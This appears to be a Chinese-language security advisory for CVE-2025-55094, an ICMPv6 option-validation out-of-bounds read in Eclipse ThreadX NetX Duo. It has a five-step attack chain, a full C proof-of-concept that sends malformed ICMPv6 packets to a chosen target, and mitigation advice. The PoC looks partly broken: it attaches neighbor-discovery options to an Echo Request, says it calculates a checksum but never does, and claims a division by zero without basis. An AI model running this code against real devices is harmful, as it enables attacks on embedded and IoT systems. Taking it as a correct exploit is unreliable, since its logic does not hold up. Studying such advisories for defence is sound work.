CVE-2025-55094：NetX Duo ICMPv6选项验证越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-55094

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse ThreadX NetX Duo

漏洞概述

CVE-2025-55094是Eclipse基金会ThreadX操作系统网络支持模块NetX Duo中的一个高危安全漏洞。该漏洞存在于NetX Duo 6.4.4之前的版本中，具体位于_nx_icmpv6_validate_options()函数中。当系统处理包含ICMPv6选项的数据包时，该函数未能正确验证输入数据的长度边界，导致可能出现越界读取（Out-of-Bounds Read）问题。

NetX Duo是ThreadX实时操作系统（RTOS）的双协议栈（IPv4/IPv6）网络协议栈实现，广泛应用于嵌入式设备和物联网（IoT）产品中。该漏洞由Eclipse开发者[email protected]发现并报告。攻击者可以通过网络远程发送精心构造的ICMPv6数据包来触发该漏洞，无需任何身份认证或用户交互。

该漏洞的CVSS 3.1评分为7.5分，属于高危级别。从CVSS向量可以看出，攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特权（PR:N），无需用户交互（UI:N），作用域未改变（S:U），对机密性影响为高（C:H），对完整性和可用性无影响（I:N, A:N）。这意味着攻击者可以利用该漏洞读取受影响的NetX Duo设备内存中的敏感信息，可能导致信息泄露。虽然该漏洞不会直接导致系统崩溃或代码执行，但内存信息泄露可能为后续攻击提供重要情报。

技术细节

NetX Duo的_nx_icmpv6_validate_options()函数负责验证ICMPv6数据包中选项字段的合法性。ICMPv6协议在邻居发现、路径MTU发现等机制中广泛使用选项字段，选项以类型-长度-值（TLV）格式编码。

漏洞的根本原因在于该函数在遍历和验证ICMPv6选项时，未能充分检查选项数据的边界条件。当攻击者构造一个包含畸形ICMPv6选项的数据包时，例如选项长度字段被设置为超出实际数据包长度的值，或者选项链中的长度字段导致指针越过数据包缓冲区边界时，函数会尝试读取缓冲区之外的内存内容。

利用方式方面，攻击者只需通过网络向目标设备发送一个精心构造的ICMPv6数据包即可触发该漏洞。具体的PoC构造思路如下：

1. 构造一个ICMPv6 Echo Request或其他类型的ICMPv6消息；
2. 在消息中附加畸形选项，选项的Type字段设置为有效值（如Source Link-Layer Address选项类型1，或Prefix Information选项类型3等）；
3. 将选项的Length字段设置为不合理的值（例如0或超过剩余数据包长度的值）；
4. 当NetX Duo的_nx_icmpv6_validate_options()函数处理该数据包时，会基于不可信的Length字段计算读取偏移，导致越界读取。

该漏洞的影响范围包括所有使用NetX Duo 6.4.4之前版本的ThreadX设备。由于ThreadX广泛应用于工业控制、医疗设备、消费电子等嵌入式领域，该漏洞的潜在影响面较大。

攻击链分析

STEP 1

步骤1：发现目标

攻击者通过网络扫描或情报收集，识别出使用NetX Duo 6.4.4之前版本的ThreadX嵌入式设备。由于ThreadX广泛应用于IoT设备、工业控制系统等，攻击者可以通过识别设备的网络行为特征来定位目标。

STEP 2

步骤2：构造恶意ICMPv6数据包

攻击者构造一个包含畸形选项的ICMPv6数据包。关键在于设置选项的Length字段为不合理的值（如0xFF），使_nx_icmpv6_validate_options()函数在验证过程中计算出超出实际数据包缓冲区的偏移量。

STEP 3

步骤3：发送恶意数据包

攻击者通过原始套接字（raw socket）将构造好的ICMPv6数据包发送到目标设备的IPv6地址。由于漏洞可远程利用且无需认证，攻击者可以从互联网直接发起攻击。

STEP 4

步骤4：触发越界读取

目标设备的NetX Duo协议栈在接收到该ICMPv6数据包后，调用_nx_icmpv6_validate_options()函数进行选项验证。函数基于不可信的Length字段计算读取位置，导致读取超出数据包缓冲区边界的内存内容。

STEP 5

步骤5：信息泄露

越界读取的内存内容可能被攻击者通过侧信道或其他手段推断出来，导致设备内存中的敏感信息（如密钥、配置数据、用户凭证等）泄露。泄露的信息可被用于后续更深入的攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-55094 - NetX Duo ICMPv6 Options Validation OOB Read PoC
 * 
 * This PoC constructs a malformed ICMPv6 packet with invalid options
 * to trigger an out-of-bounds read in _nx_icmpv6_validate_options().
 * 
 * Compile: gcc -o poc poc.c -lsocket -lnsl
 * Usage: sudo ./poc <target_ipv6_address>
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip6.h>
#include <netinet/icmp6.h>

#define ICMPV6_ECHO_REQUEST 128
#define OPT_TYPE_SOURCE_LLADDR 1
#define OPT_TYPE_PREFIX_INFO 3

/* Build a malformed ICMPv6 Echo Request with oversized option length */
int build_malformed_icmpv6(unsigned char *buf, int *len) {
    struct icmp6_hdr *icmp6;
    unsigned char *ptr;
    
    /* ICMPv6 header */
    icmp6 = (struct icmp6_hdr *)buf;
    icmp6->icmp6_type = ICMPV6_ECHO_REQUEST;
    icmp6->icmp6_code = 0;
    icmp6->icmp6_id = htons(0x1234);
    icmp6->icmp6_seq = htons(0x0001);
    
    ptr = buf + sizeof(struct icmp6_hdr);
    
    /* Malformed option: Type=Source LL Address, Length=255 (way beyond packet) */
    *ptr++ = OPT_TYPE_SOURCE_LLADDR;  /* Type: 1 */
    *ptr++ = 0xFF;                      /* Length: 255 - malformed, exceeds buffer */
    /* Fill with pattern to trigger OOB read */
    memset(ptr, 0x41, 6);
    ptr += 6;
    
    /* Second malformed option to further trigger validation failure */
    *ptr++ = OPT_TYPE_PREFIX_INFO;     /* Type: 3 */
    *ptr++ = 0x00;                      /* Length: 0 - invalid, causes division by zero or OOB */
    
    /* Calculate checksum */
    *len = ptr - buf;
    return 0;
}

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in6 target;
    unsigned char packet[256];
    int pkt_len;
    
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <target_ipv6_address>\n", argv[0]);
        return 1;
    }
    
    /* Create raw ICMPv6 socket */
    sock = socket(AF_INET6, SOCK_RAW, IPPROTO_ICMPV6);
    if (sock < 0) {
        perror("socket");
        return 1;
    }
    
    /* Setup target address */
    memset(&target, 0, sizeof(target));
    target.sin6_family = AF_INET6;
    target.sin6_port = 0;
    if (inet_pton(AF_INET6, argv[1], &target.sin6_addr) != 1) {
        fprintf(stderr, "Invalid IPv6 address\n");
        close(sock);
        return 1;
    }
    
    /* Build malformed ICMPv6 packet */
    build_malformed_icmpv6(packet, &pkt_len);
    
    /* Send the malicious packet */
    printf("[+] Sending malformed ICMPv6 packet to %s\n", argv[1]);
    if (sendto(sock, packet, pkt_len, 0, 
               (struct sockaddr *)&target, sizeof(target)) < 0) {
        perror("sendto");
        close(sock);
        return 1;
    }
    
    printf("[+] Packet sent. Target may have experienced OOB read.\n");
    close(sock);
    return 0;
}

影响范围

NetX Duo < 6.4.4

防御指南

临时缓解措施

在无法立即升级NetX Duo版本的情况下，建议采取以下临时缓解措施：1）在网络防火墙或路由器上过滤来自不可信来源的ICMPv6数据包，特别是包含畸形选项的ICMPv6消息；2）对嵌入式设备所在的网络进行分段隔离，限制外部网络对设备的直接访问；3）如果设备支持，禁用ICMPv6 Echo Request的处理功能；4）监控网络流量，检测异常的ICMPv6数据包；5）联系设备供应商获取针对该漏洞的补丁或修复版本。